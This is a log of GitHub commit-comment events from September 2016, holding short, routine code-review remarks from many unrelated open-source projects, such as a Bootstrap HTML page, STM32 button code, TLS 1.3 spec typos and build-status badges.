{"id":"4511107039","type":"CommitCommentEvent","actor":{"login":"castronetoo"},"repo":{"name":"castronetoo/BloodBrothers"},"payload":{"comment":{"id":18887755,"position":null,"line":null,"path":null,"commit_id":"a68acc0ab6b32da03069696022ace9d3fd6e8ce0","created_at":"2016-09-02T23:02:57Z","updated_at":"2016-09-02T23:02:57Z","body":"<!-- <!DOCTYPE html>\r\n<html>\r\n<head>\r\n    <meta charset=\"utf-8\">\r\n    <title>Doação</title>\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n    <!-- pra saber de onde a pessoa está acessando(PC, Celular), tamanho da tela do computador, -->\r\n<!--    <link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css\" integrity=\"sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7\" crossorigin=\"anonymous\">\r\n    <link rel=\"stylesheet\" href=\"index.css\">\r\n</head>\r\n<body>\r\n    <nav class=\"navbar navbar-default\">\r\n        <div class=\"container\">\r\n            <ul class=\"nav navbar-nav navbar-right\">\r\n                <li><a href=\"#\">Cadastro</a></li>\r\n\t\t\t\t<li><a href=\"#\">Campanhas ativas</a></li>\r\n\t\t\t\t<li><a href=\"#\">Login</a></li>\r\n                <li class=\"dropdown\">\r\n                    <a href=\"#\" class=\"dropdown-toggle\" data-toggle=\"dropdown\" role=\"button\" aria-haspopup=\"true\" aria-expanded=\"false\">Relatórios <span class=\"caret\"></span></a>\r\n\t\t\t\t\t\t<ul class=\"dropdown-menu\">\r\n                        <li><a href=\"#\">Doação</a></li>\r\n                        <li><a href=\"#\">Data de exame</a></li>\r\n                        <li><a href=\"#\">Eventos Cadastrados</a></li>\r\n                        <li role=\"separator\" class=\"divider\"></li>\r\n                        <li><a href=\"#\">Quadro Geral</a></li>\r\n                    </ul>\r\n                </li>\r\n\t\t\t\t\r\n            </ul>\r\n        </div>\r\n    </nav>\r\n\r\n   \r\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js\"></script>\r\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js\" integrity=\"sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS\" crossorigin=\"anonymous\"></script>\r\n</body>\r\n</html>\r\n\r\n\r\nOBS: POR FAVOR RETIRAR  O COMENTÁRIO EM CIMA NAS LINHAS 1 E 7 (<!--) VLWWW"}},"created_at":"2016-09-02T23:02:57Z"}
{"id":"4511107095","type":"CommitCommentEvent","actor":{"login":"nexus166"},"repo":{"name":"nexus166/utils"},"payload":{"comment":{"id":18887757,"position":null,"line":null,"path":null,"commit_id":"ecaa6bf6935f877aad97724d697b7d0c0d3dc05a","created_at":"2016-09-02T23:02:58Z","updated_at":"2016-09-02T23:02:58Z","body":"remember to edit the banman.log path according to needs"}},"created_at":"2016-09-02T23:02:58Z"}
{"id":"4511107167","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887758,"position":30,"line":30,"path":"examples/stm32f429discovery/button/Makefile","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:02:59Z","updated_at":"2016-09-02T23:02:59Z","body":"Nope."}},"created_at":"2016-09-02T23:02:59Z"}
{"id":"4511112379","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887767,"position":5,"line":5,"path":"examples/stm32f429discovery/button/button.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:04:32Z","updated_at":"2016-09-02T23:04:32Z","body":"`static volatile int status = 0;`"}},"created_at":"2016-09-02T23:04:32Z"}
{"id":"4511113737","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887769,"position":8,"line":8,"path":"examples/stm32f429discovery/button/button.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:04:53Z","updated_at":"2016-09-02T23:04:53Z","body":"`status ^= 1;`"}},"created_at":"2016-09-02T23:04:53Z"}
{"id":"4511115772","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887773,"position":31,"line":31,"path":"examples/stm32f429discovery/button/button.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:05:31Z","updated_at":"2016-09-02T23:05:31Z","body":"```\r\nwhile (1) {\r\n    gpio_set(led, status);\r\n}\r\n```"}},"created_at":"2016-09-02T23:05:31Z"}
{"id":"4511117127","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887777,"position":13,"line":13,"path":"examples/stm32f429discovery/button/button.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:05:58Z","updated_at":"2016-09-02T23:05:58Z","body":"`pin_t led, button;`"}},"created_at":"2016-09-02T23:05:58Z"}
{"id":"4511119901","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":18887785,"position":2,"line":2,"path":"extra-network/ufw/autobuild/overrides/usr/lib/systemd/system/ufw.service","commit_id":"d1d5c5c93b0bd61280455dada1e99579f1b495ce","created_at":"2016-09-02T23:06:53Z","updated_at":"2016-09-02T23:06:53Z","body":"Description: `the Uncomplicated Firewall`"}},"created_at":"2016-09-02T23:06:53Z"}
{"id":"4511130043","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18887803,"position":10,"line":14,"path":"srcpkgs/boswars/template","commit_id":"a33395fb0c927287bede6f8b773c678a9e0d81a7","created_at":"2016-09-02T23:10:17Z","updated_at":"2016-09-02T23:10:17Z","body":"I haven't tried. Usually nocross=yes packages require some kind of host binary which the package does not supply. I didn't care too much, just wanted to fix the PIE issue."}},"created_at":"2016-09-02T23:10:17Z"}
{"id":"4511131964","type":"CommitCommentEvent","actor":{"login":"mourner"},"repo":{"name":"mapbox/mapbox-gl-js"},"payload":{"comment":{"id":18887808,"position":null,"line":null,"path":null,"commit_id":"9735680596278c93b32f04e8c198fda2e4152711","created_at":"2016-09-02T23:11:02Z","updated_at":"2016-09-02T23:11:02Z","body":"Why? It's still used in the scripts."}},"created_at":"2016-09-02T23:11:02Z"}
{"id":"4511135625","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/p4-plugin"},"payload":{"comment":{"id":18887812,"position":108,"line":108,"path":"src/main/java/org/jenkinsci/plugins/p4/groovy/GetP4Step.java","commit_id":"ce55b6cfa989373d9cdf8421d102306a21bab88b","created_at":"2016-09-02T23:12:27Z","updated_at":"2016-09-02T23:12:27Z","body":"Makes little sense why you have `GetP4` as a separate class. It has no descriptor, so it cannot be used independently. Inline its `perform` method."}},"created_at":"2016-09-02T23:12:27Z"}
{"id":"4511135757","type":"CommitCommentEvent","actor":{"login":"jedwards1211"},"repo":{"name":"jedwards1211/crater"},"payload":{"comment":{"id":18887813,"position":null,"line":null,"path":null,"commit_id":"e4470f3a63254f017d9cfc4ea5a4a91bf8a468dd","created_at":"2016-09-02T23:12:30Z","updated_at":"2016-09-02T23:12:30Z","body":"fix #7 "}},"created_at":"2016-09-02T23:12:30Z"}
{"id":"4511142021","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":18887828,"position":20,"line":170,"path":"Sherlock/replicator.h","commit_id":"b212fc1ed22864bb9c34f9a85ed85cff5e0d226d","created_at":"2016-09-02T23:15:03Z","updated_at":"2016-09-02T23:15:03Z","body":"`'\\n'` or `'\\r'` please.\r\nAlso, I assume the string can't be empty here, but a `CURRENT_ASSERT` for it would be nice."}},"created_at":"2016-09-02T23:15:03Z"}
{"id":"4511145130","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/p4-plugin"},"payload":{"comment":{"id":18887837,"position":38,"line":38,"path":"src/main/java/org/jenkinsci/plugins/p4/groovy/GetP4Task.java","commit_id":"ce55b6cfa989373d9cdf8421d102306a21bab88b","created_at":"2016-09-02T23:16:18Z","updated_at":"2016-09-02T23:16:18Z","body":"Never implement this method. You want `MasterToSlaveFileCallable`. (Or actually just `MasterToSlaveCallable`, since you seem to be ignoring the parameter of `invoke`.)"}},"created_at":"2016-09-02T23:16:18Z"}
{"id":"4511153649","type":"CommitCommentEvent","actor":{"login":"wysohn"},"repo":{"name":"DRE2N/DungeonsXL"},"payload":{"comment":{"id":18887848,"position":null,"line":null,"path":null,"commit_id":"f1de40ef2f7ffeb910aa7ba340b28bf0694a51a8","created_at":"2016-09-02T23:19:51Z","updated_at":"2016-09-02T23:19:51Z","body":"ohh just realized that there is a separate branch for 0.15\r\n\r\nI was looking at 1.14 that's why :/\r\n\r\nI'm kind of new to git system"}},"created_at":"2016-09-02T23:19:51Z"}
{"id":"4511153679","type":"CommitCommentEvent","actor":{"login":"GuyAglionby"},"repo":{"name":"GuyAglionby/Quests"},"payload":{"comment":{"id":18887849,"position":null,"line":null,"path":null,"commit_id":"ade16b3d98880801813c450ebee07f6d6ee1afaf","created_at":"2016-09-02T23:19:52Z","updated_at":"2016-09-02T23:19:52Z","body":"Didn't notice #409 which is also this issue"}},"created_at":"2016-09-02T23:19:52Z"}
{"id":"4511153785","type":"CommitCommentEvent","actor":{"login":"vheinitz"},"repo":{"name":"mwasiluk/angular-surveys"},"payload":{"comment":{"id":18887852,"position":null,"line":null,"path":null,"commit_id":"0c4717b51e8212e99e9c5bd51df67126d061fd86","created_at":"2016-09-02T23:19:56Z","updated_at":"2016-09-02T23:19:56Z","body":"Russian translation added"}},"created_at":"2016-09-02T23:19:56Z"}
{"id":"4511156478","type":"CommitCommentEvent","actor":{"login":"rhvall"},"repo":{"name":"tidwall/SwiftWebSocket"},"payload":{"comment":{"id":18887858,"position":167,"line":1086,"path":"Source/WebSocket.swift","commit_id":"5bfe9306152ef1c31cf4ee2109b9371d209175d0","created_at":"2016-09-02T23:21:02Z","updated_at":"2016-09-02T23:21:02Z","body":"Isn't it redundant to have it specified twice \"as String\" or your intention was to cast \"Stream.PropertyKey\" as String??"}},"created_at":"2016-09-02T23:21:02Z"}
{"id":"4511157739","type":"CommitCommentEvent","actor":{"login":"Nanoseb"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887861,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:21:36Z","updated_at":"2016-09-02T23:21:36Z","body":"ok now I don't know why tarvis fails (@takluyver an idea ?)"}},"created_at":"2016-09-02T23:21:36Z"}
{"id":"4511158430","type":"CommitCommentEvent","actor":{"login":"Cyan4973"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18887863,"position":27,"line":40,"path":"contrib/pzstd/test/Makefile","commit_id":"040cfd8e7d2159b15e2b9254e7eeba4073e63c5f","created_at":"2016-09-02T23:21:52Z","updated_at":"2016-09-02T23:21:52Z","body":"Does that sound possible to add tests with asan and tsan enabled ?\r\n\r\nhttp://clang.llvm.org/docs/AddressSanitizer.html\r\nhttp://clang.llvm.org/docs/ThreadSanitizer.html"}},"created_at":"2016-09-02T23:21:52Z"}
{"id":"4511161335","type":"CommitCommentEvent","actor":{"login":"tidwall"},"repo":{"name":"tidwall/SwiftWebSocket"},"payload":{"comment":{"id":18887868,"position":167,"line":1086,"path":"Source/WebSocket.swift","commit_id":"5bfe9306152ef1c31cf4ee2109b9371d209175d0","created_at":"2016-09-02T23:23:08Z","updated_at":"2016-09-02T23:23:08Z","body":"Yes, it's redundant. "}},"created_at":"2016-09-02T23:23:08Z"}
{"id":"4511161494","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887869,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T23:23:12Z","updated_at":"2016-09-02T23:23:12Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2331 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T23:23:12Z"}
{"id":"4511162418","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18887870,"position":null,"line":null,"path":null,"commit_id":"701366be4389cde90dd25b10410d000820e8ed54","created_at":"2016-09-02T23:23:35Z","updated_at":"2016-09-02T23:23:35Z","body":"It's funny, I have the feeling that any tweak in evaluate_initiative() which adds a bonus to the \"strongSide\" or a malus to the \"weakSide\" could as well be coded outside the evaluate_initiative(), since that would help having a more accurate endgame score to determine who's ahead before we enter evaluate_initiative(). Good luck for the test anyway, of course :-)"}},"created_at":"2016-09-02T23:23:35Z"}
{"id":"4511169994","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887882,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:26:53Z","updated_at":"2016-09-02T23:26:53Z","body":"The tests are written with waypoints in Southampton; the navigation calculations will be less accurate with the portugal zone. Specifically, I'd change the default zone for the Navigation class (in `src/sailing_robot/src/sailing_robot/navigation.py`) back to 30. The only thing that should need to change is the parameters file."}},"created_at":"2016-09-02T23:26:53Z"}
{"id":"4511175707","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18887893,"position":28,"line":43,"path":"ficbot.js","commit_id":"d12b6e454a4d8148f12849f1c26695e7d45ed8aa","created_at":"2016-09-02T23:29:20Z","updated_at":"2016-09-02T23:29:20Z","body":"Seems like \"associative array\" is the best term to use in JavaScript"}},"created_at":"2016-09-02T23:29:20Z"}
{"id":"4511175732","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887894,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:29:21Z","updated_at":"2016-09-02T23:29:21Z","body":"When it constructs the Navigation object to use in ROS ([here](https://github.com/Maritime-Robotics-Student-Society/sailing-robot/blob/73f183ca68d89ca306b327769b47eaf059d10890/src/sailing_robot/scripts/tasks#L47)), it passes in the zone from the parameters. So the default in the class definition should be overridden in actual use, and only be used in tests."}},"created_at":"2016-09-02T23:29:21Z"}
{"id":"4511176164","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18887896,"position":83,"line":80,"path":"ficbot.js","commit_id":"d12b6e454a4d8148f12849f1c26695e7d45ed8aa","created_at":"2016-09-02T23:29:32Z","updated_at":"2016-09-02T23:29:32Z","body":"Notice the replacements, specifically those for braces and backslashes, are performed before the \\end{document} command and front matter are joined with the text block."}},"created_at":"2016-09-02T23:29:32Z"}
{"id":"4511177862","type":"CommitCommentEvent","actor":{"login":"Nanoseb"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887900,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:30:19Z","updated_at":"2016-09-02T23:30:19Z","body":"yes but here in the test should be ok because I changed it back to 30."}},"created_at":"2016-09-02T23:30:19Z"}
{"id":"4511178219","type":"CommitCommentEvent","actor":{"login":"mauricioabreu"},"repo":{"name":"marceloboeira/bojack"},"payload":{"comment":{"id":18887902,"position":null,"line":null,"path":null,"commit_id":"5b721d1eede4123c76ab680380e1950690b69767","created_at":"2016-09-02T23:30:28Z","updated_at":"2016-09-02T23:30:28Z","body":":clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: :clap: "}},"created_at":"2016-09-02T23:30:28Z"}
{"id":"4511178538","type":"CommitCommentEvent","actor":{"login":"mauricioabreu"},"repo":{"name":"marceloboeira/bojack"},"payload":{"comment":{"id":18887904,"position":null,"line":null,"path":null,"commit_id":"5b721d1eede4123c76ab680380e1950690b69767","created_at":"2016-09-02T23:30:36Z","updated_at":"2016-09-02T23:30:36Z","body":"Sorry :P"}},"created_at":"2016-09-02T23:30:36Z"}
{"id":"4511179633","type":"CommitCommentEvent","actor":{"login":"marceloboeira"},"repo":{"name":"marceloboeira/bojack"},"payload":{"comment":{"id":18887907,"position":null,"line":null,"path":null,"commit_id":"5b721d1eede4123c76ab680380e1950690b69767","created_at":"2016-09-02T23:31:02Z","updated_at":"2016-09-02T23:31:02Z","body":"@mauricioabreu thanks ahahah"}},"created_at":"2016-09-02T23:31:02Z"}
{"id":"4511181195","type":"CommitCommentEvent","actor":{"login":"Nanoseb"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887912,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:31:45Z","updated_at":"2016-09-02T23:31:45Z","body":"ok, I was not sure the parameter was actually used."}},"created_at":"2016-09-02T23:31:45Z"}
{"id":"4511187685","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18887922,"position":33,"line":248,"path":"openstudiocore/src/cli/main.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-02T23:34:21Z","updated_at":"2016-09-02T23:34:21Z","body":"@kbenne you ok with this?  it is needed for the application run dir finding for now.  Once Qt is no longer a core dependency this would have to be removed."}},"created_at":"2016-09-02T23:34:21Z"}
{"id":"4511188398","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18887926,"position":15,"line":125,"path":"openstudiocore/src/openstudio_app/OpenStudioApp.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-02T23:34:39Z","updated_at":"2016-09-02T23:34:39Z","body":"Right?"}},"created_at":"2016-09-02T23:34:39Z"}
{"id":"4511196927","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887938,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:38:21Z","updated_at":"2016-09-02T23:38:21Z","body":"I mean [this change](https://github.com/Maritime-Robotics-Student-Society/sailing-robot/commit/d38d27e34d43ae87cffffc5257390ffac64a550a#diff-e5b34326ab9f3ab6bedd7a4042859234L15), which you didn't change back.\r\n\r\nProperly, all the tests that use the Navigation class should specify the parameters they need, but not all of them do. And it shouldn't be necessary to change the default."}},"created_at":"2016-09-02T23:38:21Z"}
{"id":"4511200561","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18887942,"position":null,"line":null,"path":null,"commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-02T23:39:54Z","updated_at":"2016-09-02T23:39:54Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T23:39:54Z"}
{"id":"4511200626","type":"CommitCommentEvent","actor":{"login":"keomabrun"},"repo":{"name":"realms-team/solmanager"},"payload":{"comment":{"id":18887943,"position":null,"line":null,"path":null,"commit_id":"f83c2c382f02a5711723e83d4d064ea65aca5396","created_at":"2016-09-02T23:39:56Z","updated_at":"2016-09-02T23:39:56Z","body":"#75 "}},"created_at":"2016-09-02T23:39:56Z"}
{"id":"4511202239","type":"CommitCommentEvent","actor":{"login":"Nanoseb"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887948,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:40:33Z","updated_at":"2016-09-02T23:40:33Z","body":"Yes I got that, but why is the test not working right now, because in the test the utm zone is specified to 30."}},"created_at":"2016-09-02T23:40:33Z"}
{"id":"4511203990","type":"CommitCommentEvent","actor":{"login":"Nanoseb"},"repo":{"name":"Maritime-Robotics-Student-Society/sailing-robot"},"payload":{"comment":{"id":18887950,"position":null,"line":null,"path":null,"commit_id":"73f183ca68d89ca306b327769b47eaf059d10890","created_at":"2016-09-02T23:41:20Z","updated_at":"2016-09-02T23:41:20Z","body":"Ah ok no, in some other tests it is not specified"}},"created_at":"2016-09-02T23:41:20Z"}
{"id":"4511204886","type":"CommitCommentEvent","actor":{"login":"davegarrett"},"repo":{"name":"tlswg/tls13-spec"},"payload":{"comment":{"id":18887951,"position":4,"line":1094,"path":"draft-ietf-tls-tls13.md","commit_id":"1cfa45e196ee0c0eaa09feefc6d5a177417fd1fe","created_at":"2016-09-02T23:41:41Z","updated_at":"2016-09-02T23:41:41Z","body":"If you're going to have this, you should define \"illegal encoding\" to some degree, here."}},"created_at":"2016-09-02T23:41:41Z"}
{"id":"4511204932","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18887952,"position":4,"line":158,"path":"vis/analyzers/indexers/new_ngram.py","commit_id":"3002fde7719dafa8fec365c81325d94415234dde","created_at":"2016-09-02T23:41:42Z","updated_at":"2016-09-02T23:41:42Z","body":"You can use triple double quotes (`\"\"\"`) to put in long strings. That way you don't need to escape single and double quotes."}},"created_at":"2016-09-02T23:41:42Z"}
{"id":"4511204982","type":"CommitCommentEvent","actor":{"login":"davegarrett"},"repo":{"name":"tlswg/tls13-spec"},"payload":{"comment":{"id":18887953,"position":5,"line":1095,"path":"draft-ietf-tls-tls13.md","commit_id":"1cfa45e196ee0c0eaa09feefc6d5a177417fd1fe","created_at":"2016-09-02T23:41:43Z","updated_at":"2016-09-02T23:41:43Z","body":"typo: unles -> unless"}},"created_at":"2016-09-02T23:41:43Z"}
{"id":"4511205083","type":"CommitCommentEvent","actor":{"login":"davegarrett"},"repo":{"name":"tlswg/tls13-spec"},"payload":{"comment":{"id":18887954,"position":15,"line":1154,"path":"draft-ietf-tls-tls13.md","commit_id":"1cfa45e196ee0c0eaa09feefc6d5a177417fd1fe","created_at":"2016-09-02T23:41:45Z","updated_at":"2016-09-02T23:41:45Z","body":"nit: Capitalize the 'e'"}},"created_at":"2016-09-02T23:41:45Z"}
{"id":"4511205205","type":"CommitCommentEvent","actor":{"login":"davegarrett"},"repo":{"name":"tlswg/tls13-spec"},"payload":{"comment":{"id":18887955,"position":28,"line":1179,"path":"draft-ietf-tls-tls13.md","commit_id":"1cfa45e196ee0c0eaa09feefc6d5a177417fd1fe","created_at":"2016-09-02T23:41:48Z","updated_at":"2016-09-02T23:41:48Z","body":"grammar problem here; probably should be \"in the\", here"}},"created_at":"2016-09-02T23:41:48Z"}
{"id":"4511208365","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18887969,"position":21,"line":46,"path":"vis/models/indexed_piece.py","commit_id":"d2244c52795e3fc09e835f04ba325a344d41d8be","created_at":"2016-09-02T23:43:09Z","updated_at":"2016-09-02T23:43:09Z","body":"This should probably be removed."}},"created_at":"2016-09-02T23:43:09Z"}
{"id":"4511209759","type":"CommitCommentEvent","actor":{"login":"Brazuca87"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18887973,"position":null,"line":null,"path":null,"commit_id":"cace722f9930ba0e70d99adec653329f39f7dbc2","created_at":"2016-09-02T23:43:42Z","updated_at":"2016-09-02T23:43:42Z","body":"@NoxxDev \r\nIt seems to always get stuck after a rename, I'm wondering if the delay is using seconds instead of milliseconds... Cant debug right now, as I'm leaving home, but will turn the rename off for now and see what happens :)"}},"created_at":"2016-09-02T23:43:42Z"}
{"id":"4511210486","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18887974,"position":5,"line":23,"path":"vis/tests/test_note_beat_strength_indexer.py","commit_id":"57df9ef13ae97fab4ea6246387a5980ba1ba5384","created_at":"2016-09-02T23:44:02Z","updated_at":"2016-09-02T23:44:02Z","body":"Whoops. :)"}},"created_at":"2016-09-02T23:44:02Z"}
{"id":"4511210564","type":"CommitCommentEvent","actor":{"login":"boredherobrine13"},"repo":{"name":"zygimantus/morefuelsmod-1.10"},"payload":{"comment":{"id":18887976,"position":null,"line":null,"path":null,"commit_id":"9d59a2701b24524f1218cb5b40d5ea4887a6c5cb","created_at":"2016-09-02T23:44:05Z","updated_at":"2016-09-02T23:44:05Z","body":"Hey man, would you mind updating this to include \"Bituminous Coal Ore\" ??? I just added that in 1.5.0 and I have no translation for it."}},"created_at":"2016-09-02T23:44:05Z"}
{"id":"4511212677","type":"CommitCommentEvent","actor":{"login":"Dev-iL"},"repo":{"name":"evant/binding-collection-adapter"},"payload":{"comment":{"id":18887978,"position":null,"line":null,"path":null,"commit_id":"49a0cc196bbc0370a4f1689d87092892f3f0595e","created_at":"2016-09-02T23:45:00Z","updated_at":"2016-09-02T23:45:00Z","body":"@evant - I've committed a version with [some dependency updates](4dc5e4c0dfda0bd21dac39523ee68d45532cd326) (most notably gradle v3.0 and the gradle android plugin to 2.2.0-rc1). I tried the demo app on my API23 phone and it compiles and runs well. \r\n\r\nShould I submit a PR, or do you consider it too large of a jump?"}},"created_at":"2016-09-02T23:45:00Z"}
{"id":"4511214661","type":"CommitCommentEvent","actor":{"login":"piotrpalek"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18887982,"position":325,"line":7005,"path":"src/nvim/eval.c","commit_id":"8fb7273ac0b981eeb9afdc82675b908c1600d34f","created_at":"2016-09-02T23:45:53Z","updated_at":"2016-09-02T23:45:53Z","body":"I came here from twitter (no idea about neovim codebase) and just noticed that `wordcount` doesn't have and equivalent entry in the lua file.. just saying in case this is a typo ¯\\_(ツ)_/¯"}},"created_at":"2016-09-02T23:45:53Z"}
{"id":"4511215377","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18887984,"position":null,"line":null,"path":null,"commit_id":"a66a815eaf8106f759823beff42261b57775b9b2","created_at":"2016-09-02T23:46:13Z","updated_at":"2016-09-02T23:46:13Z","body":"👍 "}},"created_at":"2016-09-02T23:46:13Z"}
{"id":"4511216177","type":"CommitCommentEvent","actor":{"login":"rcasachi"},"repo":{"name":"rcasachi/ComercialFX"},"payload":{"comment":{"id":18887985,"position":4,"line":3,"path":"src/comercialfx/controller/man/JfrmMenuManController.java","commit_id":"7883df395c0c7a471b5ec0fe45ad0a5dd97f7802","created_at":"2016-09-02T23:46:35Z","updated_at":"2016-09-02T23:46:35Z","body":"Verificar"}},"created_at":"2016-09-02T23:46:35Z"}
{"id":"4511216474","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"mlubin/Pajarito.jl"},"payload":{"comment":{"id":18887988,"position":null,"line":null,"path":null,"commit_id":"bcb5e17f2d68bbf9d439151502375dd9b67495f1","created_at":"2016-09-02T23:46:43Z","updated_at":"2016-09-02T23:46:43Z","body":":+1: "}},"created_at":"2016-09-02T23:46:43Z"}
